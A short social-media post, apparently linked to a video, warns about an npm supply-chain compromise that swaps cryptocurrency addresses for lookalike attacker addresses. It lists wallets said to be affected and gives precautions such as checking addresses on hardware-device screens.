https://www.youtube.com/watch?v=R0M2TL7RARw

nostr:npub1rxysxnjkhrmqd3ey73dp9n5y5yvyzcs64acc9g0k2epcpwwyya4spvhnp8

🚨 Summary

A major security incident is unfolding involving npm (Node Package Manager), widely used in Bitcoin and cryptocurrency wallet software. A developer’s npm account was compromised, allowing malicious code to spread through the ecosystem.

🔑 What Happened

- A supply chain attack injected malicious code into npm packages used by many wallets.

- The code can silently replace crypto addresses during transactions with attacker-controlled ones.

- It doesn’t just substitute a random address—it chooses one visually similar to the intended recipient, making detection harder.

- Risk applies across multiple cryptocurrencies, not just Bitcoin.

🛠️ Impacted Wallets & Apps

Hardware wallets with npm-dependent companion apps:

Trezor (all models)

Ledger (Nano S, X, Stax)

BitBox02

Blockstream Jade

Keystone

BitKey

Hot/software wallets using npm:

Nunchuk

Blockstream Green

BlueWallet

Muun Wallet

Phoenix (only for on-chain, not Lightning)

Zeus (on-chain)

Exodus

Tangem app

🧭 Recommended Actions

1) Do not panic. If not actively transacting, funds are likely safe.

2) Verify all addresses carefully (not just first/last characters—check the full string).

3) Use hardware devices with a screen to confirm addresses before signing.

4) Avoid using compromised companion apps. Switch to Sparrow, Specter, Electrum, or Wasabi where possible.

5) Avoid BitKey and Tangem for now since they lack screens and require their own npm-dependent apps.

6) Hold off on non-urgent on-chain transactions until more clarity/patches emerge.

7) Lightning payments (invoices) appear unaffected.